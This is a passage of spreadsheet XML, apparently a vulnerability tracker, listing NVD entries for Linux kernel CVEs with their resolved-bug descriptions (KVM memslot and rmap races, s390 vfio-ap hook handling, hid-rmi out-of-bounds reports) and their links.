and KVM_IRQ_LINE) or directly via KVM_SIGNAL_MSI, and is never checked
against EIOINTC_IRQS.
eiointc_set_irq() uses the value with __set_bit()/__clear_bit() on the
256-bit isr bitmap, eiointc_update_irq() then indexes sw_coremap[] and
the per-cpu coreisr/sw_coreisr bitmaps with it. Therefore a data value
&gt;= 256 reads and writes memory past the end of those arrays, i.e. any
process holding a VM fd can corrupt kernel memory beyond the allocation
of loongarch_eiointc.
Reject MSI data that doesn't fit in the EIOINTC irq space. The DMSINTC
path is unaffected as it decodes the vector from the address and masks
it.</t>
        </is>
      </c>
      <c r="S221" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89907</t>
        </is>
      </c>
    </row>
    <row r="222">
      <c r="A222" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B222" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C222" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89908</t>
        </is>
      </c>
      <c r="D222" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E222" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F222" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G222" s="5" t="inlineStr"/>
      <c r="H222" s="5" t="inlineStr"/>
      <c r="I222" s="5" t="inlineStr"/>
      <c r="J222" s="5" t="inlineStr"/>
      <c r="K222" s="5" t="inlineStr"/>
      <c r="L222" s="5" t="inlineStr"/>
      <c r="M222" s="5" t="inlineStr"/>
      <c r="N222" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O222" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P222" s="5" t="inlineStr"/>
      <c r="Q222" s="5" t="inlineStr"/>
      <c r="R222" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
LoongArch: KVM: Preserve memslot arch flags on KVM_MR_FLAGS_ONLY
kvm_arch_prepare_memory_region() computes new-&gt;arch.flags, i.e. whether
a memslot is KVM_MEM_HUGEPAGE_CAPABLE or KVM_MEM_HUGEPAGE_INCAPABLE,
only for KVM_MR_CREATE and KVM_MR_MOVE, and returns early for every
other change. But the generic code allocates a zeroed memslot for every
change and never copies old-&gt;arch, so after a KVM_MR_FLAGS_ONLY update,
e.g. toggling KVM_MEM_LOG_DIRTY_PAGES for live migration, the active
memslot has arch.flags == 0.
With both flags clear, fault_supports_huge_mapping() falls through to
the alignment check on the HVA range alone, which no longer verifies
that the GPA and HVA have the same offset within a PMD. A memslot that
was marked KVM_MEM_HUGEPAGE_INCAPABLE because of a GPA/HVA offset
mismatch can then be mapped with PMD entries on read faults, and since
kvm_map_page() aligns the gfn and the pfn independently, the guest ends
up accessing the wrong host pages, exactly the "d -&gt; f, e -&gt; g" case
described in the comment above the check.
Carry the arch flags over from the old memslot for KVM_MR_FLAGS_ONLY,
as the GPA, HVA and size are guaranteed to be unchanged for that case.</t>
        </is>
      </c>
      <c r="S222" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89908</t>
        </is>
      </c>
    </row>
    <row r="223">
      <c r="A223" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B223" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C223" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89913</t>
        </is>
      </c>
      <c r="D223" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E223" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F223" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G223" s="5" t="inlineStr"/>
      <c r="H223" s="5" t="inlineStr"/>
      <c r="I223" s="5" t="inlineStr"/>
      <c r="J223" s="5" t="inlineStr"/>
      <c r="K223" s="5" t="inlineStr"/>
      <c r="L223" s="5" t="inlineStr"/>
      <c r="M223" s="5" t="inlineStr"/>
      <c r="N223" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O223" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P223" s="5" t="inlineStr"/>
      <c r="Q223" s="5" t="inlineStr"/>
      <c r="R223" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
KVM: arm64: vgic-v3: take an LPI reference in vgic_v3_save_pending_tables
vgic_v3_save_pending_tables() iterates dist-&gt;lpi_xa using xa_for_each()
and dereferences the returned struct vgic_irq in the loop body without
holding a reference on the LPI.
The xarray iterator only provides temporary RCU coverage while looking up
the current entry. That is not sufficient for this loop body, which reads
fields from struct vgic_irq and performs guest memory accesses before the
iteration completes.
A concurrent path can trigger this race: the irqfd cached injection path
(vgic_its_inject_cached_translation) obtains a transient LPI reference
via vgic_its_check_cache() without holding kvm-&gt;lock, vcpu-&gt;mutex,
config_lock, or its_lock. If guest ITS DISCARD then drops the cache and
ITE references under its_lock, the transient inject reference may become
the final one. When vgic_put_irq() drops it, the LPI is erased from
lpi_xa and freed via kfree_rcu(). Meanwhile, vgic_v3_save_pending_tables()
may still hold a stale pointer obtained from the xarray iterator and
dereference it after the RCU grace period completes.
Fix this by re-fetching each iterated LPI via vgic_get_irq(), which takes
a stable reference, and dropping it with vgic_put_irq() on all paths.
This matches the pattern already used by other lpi_xa iterators in the
vgic ITS code.</t>
        </is>
      </c>
      <c r="S223" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89913</t>
        </is>
      </c>
    </row>
    <row r="224">
      <c r="A224" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B224" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C224" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89928</t>
        </is>
      </c>
      <c r="D224" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E224" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F224" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G224" s="5" t="inlineStr"/>
      <c r="H224" s="5" t="inlineStr"/>
      <c r="I224" s="5" t="inlineStr"/>
      <c r="J224" s="5" t="inlineStr"/>
      <c r="K224" s="5" t="inlineStr"/>
      <c r="L224" s="5" t="inlineStr"/>
      <c r="M224" s="5" t="inlineStr"/>
      <c r="N224" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O224" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P224" s="5" t="inlineStr"/>
      <c r="Q224" s="5" t="inlineStr"/>
      <c r="R224" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
KVM: x86/mmu: Consume the locked rmap value in the lockless rmap walk
__kvm_rmap_lock() deliberately elides the rmap lock when it observes an
empty rmap.  In that case kvm_rmap_lock_readonly() also re-enables
preemption and returns zero, so the caller holds neither the rmap lock
nor a preemption reference.  The elision documents the invariant it
relies on:
	 * Elide the lock if the rmap is empty, as lockless walkers (read-only
	 * mode) don't need to (and can't) walk an empty rmap, nor can they add
	 * entries to the rmap.  I.e. the only paths that process empty rmaps
	 * do so while holding mmu_lock for write, and are mutually exclusive.
kvm_rmap_age_gfn_range() ignores the returned value and unconditionally
enters for_each_rmap_spte_lockless().  The iterator started with
rmap_get_first(), which re-reads rmap_head-&gt;val rather than using the
value returned by the lock.  If a writer populates the rmap between the
lock's read and the iterator's re-read, the aging path walks the newly
installed rmap without holding its lock.
For a KVM_RMAP_MANY rmap this leaves the walker following a
pte_list_desc chain that it never locked.  A writer holding mmu_lock for
write may free that chain (e.g. kvm_zap_all_rmap_sptes() on the recycle
path, or any rmap zap) via kmem_cache_free() while the walk is in
progress, giving a slab use-after-free.  Nothing serialises the two: the
aging path runs without mmu_lock when CONFIG_KVM_MMU_LOCKLESS_AGING=y,
and the rmap lock that would otherwise exclude the writer was elided.
Because the empty path re-enables preemption, the interval between the
two reads can span an arbitrary scheduling delay.
Fix the class of bug by having the lockless walk consume the value
returned by the lock instead of re-reading the rmap.  Split
rmap_get_first() into __rmap_get_first(), which starts an iterator from
an already-read rmap value, and make for_each_rmap_spte_lockless() take
that value and call __rmap_get_first() directly.
kvm_rmap_age_gfn_range() passes the value returned by
kvm_rmap_lock_readonly(): when the lock was elided the value is zero,
__rmap_get_first() returns NULL, and the walk is skipped.  No lockless
walker re-reads the rmap, so the lock-elision invariant cannot be
violated, and no lock()-without-paired-unlock() path is added to the
aging code.</t>
        </is>
      </c>
      <c r="S224" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89928</t>
        </is>
      </c>
    </row>
    <row r="225">
      <c r="A225" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B225" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C225" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89929</t>
        </is>
      </c>
      <c r="D225" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E225" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F225" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G225" s="5" t="inlineStr"/>
      <c r="H225" s="5" t="inlineStr"/>
      <c r="I225" s="5" t="inlineStr"/>
      <c r="J225" s="5" t="inlineStr"/>
      <c r="K225" s="5" t="inlineStr"/>
      <c r="L225" s="5" t="inlineStr"/>
      <c r="M225" s="5" t="inlineStr"/>
      <c r="N225" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O225" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P225" s="5" t="inlineStr"/>
      <c r="Q225" s="5" t="inlineStr"/>
      <c r="R225" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
KVM: nVM: Ensure INVVPID is emulated on the correct physical CPU
When emulating INVVPID, KVM executes INVVPID on the physical CPU using
vpid02 (instead of the L1 assigned VPID), after doing some validations
on the operands. However, it is possible that the physical CPU KVM
executes INVVPID on is different from the CPU L2 is running on.
For example, in the following scenario:
- L2 runs on CPU #1 and exits to L1 (vmx-&gt;nested.vmcs02.cpu=1)
- L1 migrates to CPU #2 and executes INVVPID
- KVM executes INVVPID on CPU #2
- L1 migrates back to CPU #1 and runs L2 (vmx-&gt;nested.vmcs02.cpu=1)
The TLB entries on CPU #1 are never invalidated, because INVVPID was
executed on CPU #2, and vmcs02 never ran on a different pCPU (i.e.
vmx_vcpu_load_vmcs() will *not* request KVM_REQ_TLB_FLUSH).
Ensure that INVVPID is being executed on the same pCPU that L2 last ran
on, and if not, fallback to clearing last_vpid=0 to trigger a full VPID
flush on the next nested VM-Enter (as KVM will detect L1 using a
different VPID for L2). If L2 ends up running on a different pCPU, KVM
will flush the TLB anyway through vmx_vcpu_load_vmcs().</t>
        </is>
      </c>
      <c r="S225" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89929</t>
        </is>
      </c>
    </row>
    <row r="226">
      <c r="A226" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B226" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C226" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89932</t>
        </is>
      </c>
      <c r="D226" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E226" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F226" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G226" s="5" t="inlineStr"/>
      <c r="H226" s="5" t="inlineStr"/>
      <c r="I226" s="5" t="inlineStr"/>
      <c r="J226" s="5" t="inlineStr"/>
      <c r="K226" s="5" t="inlineStr"/>
      <c r="L226" s="5" t="inlineStr"/>
      <c r="M226" s="5" t="inlineStr"/>
      <c r="N226" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O226" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P226" s="5" t="inlineStr"/>
      <c r="Q226" s="5" t="inlineStr"/>
      <c r="R226" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
KVM: nVMX: Always flush vpid02 on first use
Make sure vpid02 is always flushed on first use by setting last_vpid=0
when allocating vpid02.  nested_vmx_transition_tlb_flush() will always
detect a VPID change on first VM-Enter after VMXON, because VPID=0 in
vmcs12 is not allowed if L1 enables VPID.
This avoids using stale TLB entries from a previous lifetime of the
VPID, that might have been associated with a different vCPU (or a
completely different VM).
Note that last_vpid is already being initialized as 0 when the vCPU is
created, but it is not reset when vpid02 is freed on VMXOFF. Hence, the
problem can only occur if L1 does VMXOFF -&gt; VMXON, runs an L2, and KVM
happens to reuse a VPID that has TLB entries on the physical CPU.</t>
        </is>
      </c>
      <c r="S226" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89932</t>
        </is>
      </c>
    </row>
    <row r="227">
      <c r="A227" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B227" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C227" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89951</t>
        </is>
      </c>
      <c r="D227" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E227" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F227" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G227" s="5" t="inlineStr"/>
      <c r="H227" s="5" t="inlineStr"/>
      <c r="I227" s="5" t="inlineStr"/>
      <c r="J227" s="5" t="inlineStr"/>
      <c r="K227" s="5" t="inlineStr"/>
      <c r="L227" s="5" t="inlineStr"/>
      <c r="M227" s="5" t="inlineStr"/>
      <c r="N227" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O227" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P227" s="5" t="inlineStr"/>
      <c r="Q227" s="5" t="inlineStr"/>
      <c r="R227" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
batman-adv: fix stale receive device on merged fragments
Fragment reassembly reuses the skb from the highest-numbered buffered
fragment as the merged packet. When that fragment was received on a hard
interface which is deleted before the chain completes, the merged skb can
re-enter the receive path with a stale skb-&gt;dev and skb_iif.
batadv_batman_skb_recv() passes such merged packets through the normal
receive handlers again. DAT and bridge loop avoidance both derive the ARP
header length from skb-&gt;dev, so they can dereference the freed net_device
before the packet reaches the local mesh interface.
Refresh the receive device metadata from the current receive device before
running the packet handlers. This keeps internally reinjected merged
fragments consistent with the normal receive path after hard interface
teardown.</t>
        </is>
      </c>
      <c r="S227" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89951</t>
        </is>
      </c>
    </row>
    <row r="228">
      <c r="A228" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B228" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C228" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89957</t>
        </is>
      </c>
      <c r="D228" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E228" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F228" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G228" s="5" t="inlineStr"/>
      <c r="H228" s="5" t="inlineStr"/>
      <c r="I228" s="5" t="inlineStr"/>
      <c r="J228" s="5" t="inlineStr"/>
      <c r="K228" s="5" t="inlineStr"/>
      <c r="L228" s="5" t="inlineStr"/>
      <c r="M228" s="5" t="inlineStr"/>
      <c r="N228" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O228" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P228" s="5" t="inlineStr"/>
      <c r="Q228" s="5" t="inlineStr"/>
      <c r="R228" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
s390/vfio-ap: Fix hot-unplug skipped when last AP adapter or domain removed
The vfio_ap_mdev_hot_unplug_cfg() function uses the return value of
bitmap_andnot() to determine whether the guest APCB needs to be updated.
However, bitmap_andnot() returns false when the resulting destination
bitmap is empty. This means that if the only adapter, domain or control
domain assigned to an mdev is removed from the host's AP configuration,
the bit is correctly cleared from the shadow APCB, but bitmap_andnot()
returns false because the result is an empty bitmap. Consequently,
do_hotplug remains 0 and vfio_ap_mdev_update_guest_apcb() is never called,
leaving the KVM guest with stale hardware access to the unplugged AP
devices.
Fix this by replacing the bitmap_andnot() return value check with
bitmap_intersects() to determine whether the shadow APCB actually
overlaps with the removal mask. If there is an intersection, call
bitmap_andnot() solely for its side effect of clearing the bits, then
unconditionally set do_hotplug to trigger the guest APCB update.</t>
        </is>
      </c>
      <c r="S228" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89957</t>
        </is>
      </c>
    </row>
    <row r="229">
      <c r="A229" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B229" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C229" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89959</t>
        </is>
      </c>
      <c r="D229" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E229" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F229" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G229" s="5" t="inlineStr"/>
      <c r="H229" s="5" t="inlineStr"/>
      <c r="I229" s="5" t="inlineStr"/>
      <c r="J229" s="5" t="inlineStr"/>
      <c r="K229" s="5" t="inlineStr"/>
      <c r="L229" s="5" t="inlineStr"/>
      <c r="M229" s="5" t="inlineStr"/>
      <c r="N229" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O229" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P229" s="5" t="inlineStr"/>
      <c r="Q229" s="5" t="inlineStr"/>
      <c r="R229" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
s390/vfio-ap: Fix control domain removal in vfio_ap_mdev_cfg_remove
The vfio_ap_config_remove function uses the bitmap_andnot function to clear
bits from the matrix_mdev-&gt;matrix.adm bitmap (specifies the control domains
assigned to the mdev). This prevents the explicitly unplugged control
domains from being removed the KVM guest. The bitmap_and function is used
instead.</t>
        </is>
      </c>
      <c r="S229" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89959</t>
        </is>
      </c>
    </row>
    <row r="230">
      <c r="A230" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B230" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C230" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89960</t>
        </is>
      </c>
      <c r="D230" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E230" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F230" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G230" s="5" t="inlineStr"/>
      <c r="H230" s="5" t="inlineStr"/>
      <c r="I230" s="5" t="inlineStr"/>
      <c r="J230" s="5" t="inlineStr"/>
      <c r="K230" s="5" t="inlineStr"/>
      <c r="L230" s="5" t="inlineStr"/>
      <c r="M230" s="5" t="inlineStr"/>
      <c r="N230" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O230" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P230" s="5" t="inlineStr"/>
      <c r="Q230" s="5" t="inlineStr"/>
      <c r="R230" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
s390/vfio-ap: fix stale pqap_hook pointer on error in vfio_ap_mdev_set_kvm()
In vfio_ap_mdev_set_kvm(), kvm-&gt;arch.crypto.pqap_hook is set to
&amp;matrix_mdev-&gt;pqap_hook before the update locks are acquired and the
mdev list is checked for a conflicting assignment. If another mdev is
already attached to the same KVM instance, the function returns -EPERM
without restoring the hook pointer, leaving kvm-&gt;arch.crypto.pqap_hook
pointing at the failing matrix_mdev instead of the mdev that legitimately
owns the KVM.
Since matrix_mdev-&gt;kvm is never set on this error path,
vfio_ap_mdev_unset_kvm() will not clean up the hook when matrix_mdev
is later closed. If matrix_mdev is subsequently freed, any PQAP
instruction executed by the guest will dereference the stale pointer
through pqap_hook_rwsem, resulting in a use-after-free.
Since kvm-&gt;arch.crypto.pqap_hook is only set in the vfio_ap_mdev_set_kvm()
function and is cleared in the vfio_ap_mdev_unset_kvm() function, a check
for 'kvm-&gt;arch.crypto.pqap_hook != NULL' is all that is needed to determine
whether it belongs to another mdev. This will alleviate the need to iterate
the matrix_dev-&gt;mdev_list list to see if the kvm object is assigned to
another mdev.This was introduced in v3 to alleviate the need to take the
mdevs_lock while iterating the list; however, this did not prevent a
potential race condition.
The pqap_hook_rwsem(write) is now performed inside
get_update_locks_for_kvm(), which is updated to acquire
pqap_hook_rwsem(write) between kvm-&gt;lock and mdevs_lock. This ordering
is consistent with the PQAP intercept path, which acquires pqap_hook_rwsem
in read mode while srcu is held under vcpu-&gt;mutex, establishing the
dependency: kvm-&gt;lock -&gt; vcpu-&gt;mutex -&gt; srcu -&gt; pqap_hook_rwsem(read).
The pqap_hook_rwsem is now released inside the
release_update_locks_for_kvm(), which is updated to release
pqap_hook_rwsem(write) between mdevs_lock and kvm-&gt;lock.
Additionally, kvm_put_kvm() in vfio_ap_mdev_unset_kvm() is moved
after release_update_locks_for_kvm(). Previously it was called while
kvm-&gt;lock was held; if it were ever the last reference, kvm_destroy_vm()
would run under kvm-&gt;lock, which would deadlock.</t>
        </is>
      </c>
      <c r="S230" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89960</t>
        </is>
      </c>
    </row>
    <row r="231">
      <c r="A231" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B231" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C231" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89995</t>
        </is>
      </c>
      <c r="D231" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E231" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F231" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G231" s="5" t="inlineStr"/>
      <c r="H231" s="5" t="inlineStr"/>
      <c r="I231" s="5" t="inlineStr"/>
      <c r="J231" s="5" t="inlineStr"/>
      <c r="K231" s="5" t="inlineStr"/>
      <c r="L231" s="5" t="inlineStr"/>
      <c r="M231" s="5" t="inlineStr"/>
      <c r="N231" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O231" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P231" s="5" t="inlineStr"/>
      <c r="Q231" s="5" t="inlineStr"/>
      <c r="R231" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dma-direct: return struct page from dma_direct_alloc_from_pool()
Commit 5b138c534fda ("dma-direct: factor out a dma_direct_alloc_from_pool
helper") changed dma_direct_alloc_from_pool() to return the CPU address
from dma_alloc_from_pool(). That fits dma_direct_alloc(), but
dma_direct_alloc_pages() also uses the helper and expects a struct page *.
Fix this by making dma_direct_alloc_from_pool() return the struct page *
again, and pass the CPU address back through an out-parameter for the
dma_direct_alloc() caller.</t>
        </is>
      </c>
      <c r="S231" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89995</t>
        </is>
      </c>
    </row>
    <row r="232">
      <c r="A232" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B232" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C232" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90000</t>
        </is>
      </c>
      <c r="D232" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E232" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F232" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G232" s="5" t="inlineStr"/>
      <c r="H232" s="5" t="inlineStr"/>
      <c r="I232" s="5" t="inlineStr"/>
      <c r="J232" s="5" t="inlineStr"/>
      <c r="K232" s="5" t="inlineStr"/>
      <c r="L232" s="5" t="inlineStr"/>
      <c r="M232" s="5" t="inlineStr"/>
      <c r="N232" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O232" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P232" s="5" t="inlineStr"/>
      <c r="Q232" s="5" t="inlineStr"/>
      <c r="R232" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
HID: rmi: fix OOB access with undersized RMI reports
The hid-rmi driver sizes its writeReport/readReport buffer purely from
the report descriptor supplied by the device, with no minimum bound:
	data-&gt;input_report_size  = hid_report_len(input_report);
	data-&gt;output_report_size = hid_report_len(output_report);
	alloc_size = data-&gt;output_report_size + data-&gt;input_report_size;
	data-&gt;writeReport = devm_kzalloc(&amp;hdev-&gt;dev, alloc_size, GFP_KERNEL);
	data-&gt;readReport = data-&gt;writeReport + data-&gt;output_report_size;
but then reads and writes fixed offsets into it.  A device declaring a
1-byte output and a 1-byte input report makes hid_report_len() return 2
for each, so alloc_size is 4, while rmi_set_page() -- reached
unconditionally at probe time through rmi_input_configured() -- stores
writeReport[4] and rmi_hid_read_block() stores writeReport[0..5].  Since
readReport lives at writeReport + output_report_size, those stores also
corrupt the window the next reply is parsed out of.
The read path is worse: the copy length comes from readReport[1], which
the device fills in and can be up to 255, and the copy starts at
&amp;readReport[2] with no regard for input_report_size, so it runs past the
end of the allocation into adjacent slab objects.  This does not even
need a lying device -- rmi_f01_probe() issues a fixed 21-byte register
read, so any device declaring an input report smaller than 23 bytes
reads out of bounds even when it answers truthfully.  Those bytes become
the register values the RMI core acts on: rmi_f01_probe() prints them to
the kernel log as the product id and exports them through the mode 0444
sysfs attribute of the same name, and rmi_driver_set_irq_bits() sends
them back to the device as the interrupt mask, so an undersized report
descriptor leaks heap contents both to unprivileged userspace and to the
device itself.
The write path has no bound either: rmi_hid_write_block() copies an
unbounded len to &amp;writeReport[4], and the largest caller a device can
drive at probe time is rmi_driver_set_irq_bits(), whose length is
derived from the interrupt source counts the device declares in its Page
Description Table.
Finally, the read loop cannot terminate on a zero-length reply: such a
reply copies nothing and advances neither bytes_read nor bytes_needed,
and because a reply did arrive the one second wait_event_timeout() does
not fire either, so a device answering 0 forever keeps the loop running
inside the probe worker with page_mutex held.  khungtaskd does not
notice, because every reply wakes the task.
Reject reports too small for what the driver builds -- 6 output bytes
for the write reports and 3 input bytes for the read handshake -- at
probe time, clamp the write and the read copy to the report sizes the
device declared, and treat a zero-length reply as an error.  A device
refused this way is started as an ordinary HID device, like one that
does not carry the RMI report ids at all.
RMI_DEVICE must not be left set in device_flags on that path, because
rmi_input_configured() would then run the RMI setup and reach
rmi_set_page(), which writes the writeReport buffer the refusal just
skipped allocating.  The bit can arrive set: rmi_probe() copies
id-&gt;driver_data into device_flags before the report checks, and a bind
through the new_id sysfs attribute can supply driver_data with
RMI_DEVICE (BIT(0)) set.  Strip the bit where driver_data is copied, so
RMI_DEVICE keeps meaning exactly "this probe validated the reports"; the
three jumps to start that predate this patch are covered as well.
The error path also clears RMI_READ_DATA_PENDING on its way out, because
that flag is what the wait at the top of the loop tests: leaving it set
would make every later wait_event_timeout() return immediately on the
stale reply and kill the read path for the rest of the device's life.
Clamping does not regress working hardware: the read loop already
handles
---truncated---</t>
        </is>
      </c>
      <c r="S232" s="6" t="inlineStr">
        <is>
